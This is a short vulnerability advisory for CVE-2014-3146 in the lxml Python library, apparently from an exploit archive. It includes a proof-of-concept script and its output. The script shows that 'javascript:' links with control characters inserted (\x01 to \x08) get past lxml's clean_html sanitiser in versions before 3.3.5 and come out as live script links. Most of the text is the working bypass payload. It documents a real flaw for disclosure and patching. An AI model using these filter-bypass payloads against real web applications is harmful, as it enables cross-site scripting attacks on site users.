lxml - 'clean_html' Security Bypass

Related Vulnerabilities: CVE-2014-3146  
Publish Date: 15 Apr 2014
                							

                source: http://www.securityfocus.com/bid/67159/info

lxml is prone to a security-bypass vulnerability.

An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks.

Versions prior to lxml 3.3.5 are vulnerable. 

from lxml.html.clean import clean_html

html = '''\
<html>
<body>
<a href="javascript:alert(0)">
aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''

print clean_html(html)


Output:

<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">
bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>